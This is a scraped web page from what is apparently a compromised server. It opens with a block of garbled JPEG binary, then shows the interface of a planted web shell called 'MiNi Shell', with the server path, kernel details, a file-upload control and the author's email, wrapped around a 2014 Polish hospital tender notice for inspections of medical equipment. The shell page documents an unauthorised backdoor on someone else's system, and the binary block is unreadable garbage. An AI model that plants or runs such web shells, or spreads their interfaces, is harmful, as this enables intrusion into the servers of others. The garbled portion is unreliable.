JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140919/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140919/199789-N-2014.html

<p class="kh_header"><b>Zgierz: Świadczenie usług przeglądów technicznych aparatury medycznej dla Wojewódzkiego Szpitala  Specjalistycznego im. Marii Skłodowskiej- Curie  w  Zgierzu,  ul. Parzęczewska 35 z podziałem na 87 części</b><br>
<b>Numer ogłoszenia: 199789 - 2014; data zamieszczenia: 19.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Szpital Specjalistyczny im. Marii Skłodowskiej-Curie w Zgierzu , ul. Parzęczewska 35, 95-100 Zgierz, woj. łódzkie, tel. 42 7144332, 7144505, faks 42 7144530.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.zgierz.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług przeglądów technicznych aparatury medycznej dla Wojewódzkiego Szpitala  Specjalistycznego im. Marii Skłodowskiej- Curie  w  Zgierzu,  ul. Parzęczewska 35 z podziałem na 87 części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Świadczenie usług przeglądów technicznych aparatury medycznej dla Wojewódzkiego Szpitala  Specjalistycznego im. Marii Skłodowskiej- Curie  w  Zgierzu,  ul. Parzęczewska 35 z podziałem na 87 części.
2. Przedmiot zamówienia jest określony we Wspólnym Słowniku Zamówień kodem CPV:  
 50.42.10.00-2. Kategoria usługi: nr 1, kod CPC: 88660.
3. Przedmiot zamówienia obejmuje swoim zakresem:
Część  1: Przeglądy alkotestów-zawiera 6 pozycji
Część  2: Przeglądy aparatu elektrochirurgicznego -zawiera 1 pozycję
Część  3: Przeglądy aparatów elektrochirurgicznych-zawiera 4 pozycje
Część  4: Przeglądy aparatu do znieczulenia ogólnego-zawiera 1 pozycję
Część  5: Przeglądy aparatu do znieczulenia ogólnego-zawiera 1 pozycję
Część  6: Przeglądy aparatu do znieczulenia ogólnego-zawiera 1 pozycję
Część  7: Przeglądy aparatu do terapii nerkowej -zawiera 1 pozycję
Część  8: Przeglądy defibrylatorów-zawiera 4 pozycje
Część  9: Przeglądy aparatu EKG -zawiera 1 pozycję
Część  10: Przeglądy fotela zabiegowego -zawiera 1 pozycję
Część  11: Przeglądy inkubatorów-zawiera 4 pozycje
Część  12: Przeglądy inkubatorów -zawiera 2 pozycje
Część  13: Przeglądy kardiomonitorów-zawiera 9 pozycji
Część  14: Przeglądy kardiomonitorów-zawiera 10 pozycji
Część  15: Przeglądy kardiomonitorów i centrali-zawiera 6 pozycji
Część  16: Przeglądy kardiomonitora-zawiera 1 pozycję
Część  17: Przeglądy kardiomonitorów-zawiera 29 pozycji
Część  18: Przeglądy kardiomonitora-zawiera 1 pozycję
Część  19: Przeglądy kardiomonitora-zawiera 1 pozycję
Część  20: Przeglądy kardiomonitora-zawiera 1 pozycję
Część  21: Przeglądy kardiomonitora-zawiera 1 pozycję
Część  22: Przeglądy kardiotokografu-zawiera 1 pozycję
Część  23: Przeglądy litotryptoru -zawiera 1 pozycję
Część  24: Przeglądy łóżek i materacy-zawiera 12 pozycji
Część  25: Przeglądy łóżek szpitalnych-zawiera 6 pozycji
Część  26: Przeglądy łóżek szpitalnych-zawiera 12 pozycji
Część  27: Przeglądy miernika bilirubiny -zawiera 1 pozycję
Część  28: Przeglądy mikroskopów-zawiera 4 pozycje
Część  29: Przeglądy mikrotomu -zawiera 1 pozycję
Część  30: Przeglądy myjni endoskopów-zawiera 1 pozycję
Część  31: Przeglądy pistoletu do biopsji -zawiera 1 pozycję
Część  32: Przeglądy polomierza -zawiera 1 pozycję
Część  33: Przeglądy pomp infuzyjnych-zawiera 23 pozycje
Część  34: Przeglądy pompy infuzyjnej-zawiera 1 pozycję
Część  35: Przeglądy pompy infuzyjnej -zawiera 1 pozycję
Część  36: Przeglądy pulsoksymetrów- zawiera 6 pozycji
Część  37: Przeglądy pulsoksymetrów- zawiera 9 pozycji
Część  38: Przeglądy pulsoksymetru -zawiera 1 pozycję
Część  39: Przeglądy pulsoksymetru -zawiera 1 pozycję
Część  40: Przeglądy laparoskopów-zawiera 2 pozycje
Część  41: Przeglądy rejestratora EKG-zawiera 1 pozycję
Część  42: Przeglądy resektoskopu -zawiera 1 pozycję
Część  43: Przeglądy respiratorów-zawiera 7 pozycji
Część  44: Przeglądy respiratora -zawiera 1 pozycję
Część  45: Przeglądy respiratora-zawiera 1 pozycję
Część  46: Przeglądy respiratora-zawiera 1 pozycję
Część  47: Przeglądy respiratorów-zawiera 3 pozycje
Część  48: Przeglądy respiratorów-zawiera 6 pozycji
Część  49: Przeglądy respiratora -zawiera 1 pozycję
Część  50: Przeglądy aparatu RTG -zawiera 1 pozycję
Część  51: Przeglądy aparatu RTG -zawiera 1 pozycję
Część  52: Przeglądy aparatu Sonocard -zawiera 1 pozycję
Część  53: Przeglądy spirometru -zawiera 1 pozycję
Część  54: Przeglądy sterylizatora-zawiera 1 pozycję
Część  55: Przeglądy sterylizatora -zawiera 1 pozycję
Część  56: Przeglądy stołu operacyjnego -zawiera 1 pozycję
Część  57: Przeglądy stołu zabiegowego -zawiera 1 pozycję
Część  58: Przeglądy strzykawki -zawiera 1 pozycję
Część  59: Przeglądy systemu nebulacji -zawiera 1 pozycję
Część  60: Przeglądy aparatu USG -zawiera 1 pozycję
Część  61: Przeglądy aparatu USG -zawiera 1 pozycję
Część  62: Przeglądy aparatu USG-zawiera 1 pozycję
Część  63: Przeglądy aparatów USG-zawiera 3 pozycje
Część  64: Przeglądy aparatu USG-zawiera 1 pozycję
Część  65: Przeglądy aparatów USG -zawiera 2 pozycje
Część  66: Przeglądy aparatu USG -zawiera 1 pozycję
Część  67: Przeglądy aparatu USG -zawiera 1 pozycję
Część  68: Przeglądy videogastroskopu -zawiera 1 pozycję	
Część  69: Przeglądy wideolaryngoskopu -zawiera 1 pozycję
Część  70: Przeglądy wiertarki -zawiera 1 pozycję
Część  71: Przeglądy wirówki-zawiera 1 pozycję
Część  72: Przeglądy zestawu do wspomagania oddechu -zawiera 1 pozycję	
Część  73: Przeglądy zestawu do wideoskopowych operacji szyi-zawiera 1 pozycję
Część  74: Przeglądy zgrzewarki -zawiera 1 pozycję
Część  75: Przeglądy aparatów EKG-zawiera 3 pozycje
Część  76: Przeglądy inkubatora-zawiera 1 pozycję
Część  77: Przeglądy płuczki do płytek laboratoryjnych-zawiera 1 pozycję
Część  78: Przeglądy elektromagnesu -zawiera 1 pozycję
Część  79: Przeglądy oftalmoskopów-zawiera 7 pozycji
Część  80: Przeglądy perymetru-zawiera 1 pozycję
Część  81: Przeglądy kamery PAL firmy Aesculap Chifa Sp. z o.o.-zawiera 1 pozycję
Część  82: Przeglądy Aparatu do resustytacji -zawiera 1 pozycję
Część  83: Przeglądy gastroduodenoskopu -zawiera 1 pozycję
Część  84: Przeglądy lampy czołowej-zawiera 1 pozycję
Część  85: Przeglądy bieżni rehabilitacyjnej-zawiera 1 pozycję
Część  86: Przeglądy procesora histologiczny-zawiera 1 pozycję
Część  87: Przeglądy systemu manometr -zawiera 1 pozycję.
Zamówienie poniżej 207 000 euro.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 87.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:
1. Spełniają warunki określone przepisami art. 22 ust. 1 ustawy Prawo zamówień publicznych.
2. Posiadają wiedzę i doświadczenie w zakresie przedmiotu zamówienia tj. wykażą się   realizacją minimum  dwóch usług przeglądów lub konserwacji lub napraw aparatury medycznej o wartości nie niższej niż:
 - 500,00 zł (pięćset złotych) brutto dla części: 1, 2, 4, 7, 8, 12, 15, 16, 24, 25, 26, 30, 36, 37, 45, 46, 50, 51, 54, 60- 70, 83, 87
  -  2.000,00 zł (dwa tysiące złotych) brutto dla części: 3, 5, 6, 11, 13, 14, 33, 40, 43, 47   
 - 7.500,00 zł (siedem tysięcy pięćset złotych) brutto dla części: 17, 48   
  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat  wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączenia dowodów, czy zostały wykonane lub są wykonywane należycie - Załącznik nr 3.     
3.	 Potwierdzą brak podstaw do wykluczenia z powodu niespełnienia warunków, o których mowa w art. 24 ust. 1, tj. przedłożą dokumenty, o których mowa w pkt. 3 ppkt. 3.2. SIWZ. Ocena spełnienia w/w warunków odbywać się będzie w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w pkt. 3 SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane usługi odpowiadają wymaganiom określonym przez 
Zamawiającego, Zamawiający żąda załączenia do oferty: 
a. oświadczenie Wykonawcy, że osoby , które będą uczestniczyć w wykonywaniu zamówienia posiadają świadectwa kwalifikacyjne E na stanowisku eksploatacji w zakresie elektroenergetycznym( dla osób zajmujących się eksploatacją urządzeń, instalacji i sieci elektroenergetycznych i wykonujących prace w zakresie: obsługi, konserwacji, napraw kontrolno- pomiarowym i montażu) do 1 kV. 
b. oświadczenie Wykonawcy, że posiada aktualne świadectwa wzorcowania i kalibracji przyrządów pomiarowych, używanych przy wykonywaniu usług</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Wszelkie zmiany niniejszej umowy mogą być dokonywane za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności. Zmiana cen będąca skutkiem zmniejszenia stawki podatku VAT nie wymaga zmiany umowy w formie aneksu.
2. Zmiany umowy mogą nastąpić w przypadku:
 a) obniżenia ceny lub innych zmian korzystnych dla Zamawiającego.
 b) w przypadku, gdy zmiany dotyczą nieistotnych postanowień umowy, tj. zmian, o których wiedza na etapie postępowania o udzielenie zamówienia nie miałaby wpływu na krąg podmiotów ubiegających się o udzielenie zamówienia czy też wynik postępowania przetargowego.
c) zmiany terminu obowiązywania umowy, zgodnie z § 5 ust. 3.
3. Zmiany umowy, o których mowa pkt. a, b, c  dokonywane są w drodze aneksu do umowy. 
4.Warunkiem dokonania zmiany umowy jest wystąpienie przez stronę zainteresowaną  wprowadzeniem zmian do umowy z pisemnym wnioskiem zawierającym proponowane zmiany wraz z uzasadnieniem faktycznym i prawnym. Do wniosku powinien być dołączony projekt aneksu do umowy.
5.Zamawiający dopuszcza możliwość zmiany terminu obowiązywania umowy i przedłużenia okresu jej realizacji o maksymalny okres 3 miesięcy, w przypadku niewyczerpania kwoty zobowiązania wynikającego z umowy. W takim przypadku ogólna wartość umowy nie może ulec zmianie, podobnie jak ceny jednostkowe brutto, chyba że niniejsza umowa stanowi inaczej</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.zgierz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w Wojewódzkim Szpitalu Specjalistycznym im. Marii Skłodowskiej-Curie w Zgierzu, ul. Parzęczewska 35 - Sekcja Zamówień Publicznych (budynek administracji, pok. 14).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.10.2014 godzina 10:45, miejsce: w Wojewódzkim Szpitalu Specjalistycznym im. Marii Skłodowskiej-Curie w Zgierzu, ul. Parzęczewska 35 - Sekcja Zamówień Publicznych (budynek administracji, pok. 14).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Zamawiający nie dopuszcza możliwości złożenia oferty wariantowej. 2. Zamawiający nie przewiduje zawarcia umowy ramowej, ustanowienia dynamicznego systemu zakupów oraz zastosowania aukcji elektronicznej. 3. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy. 4. Oferta może obejmować całość zamówienia lub poszczególne części..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com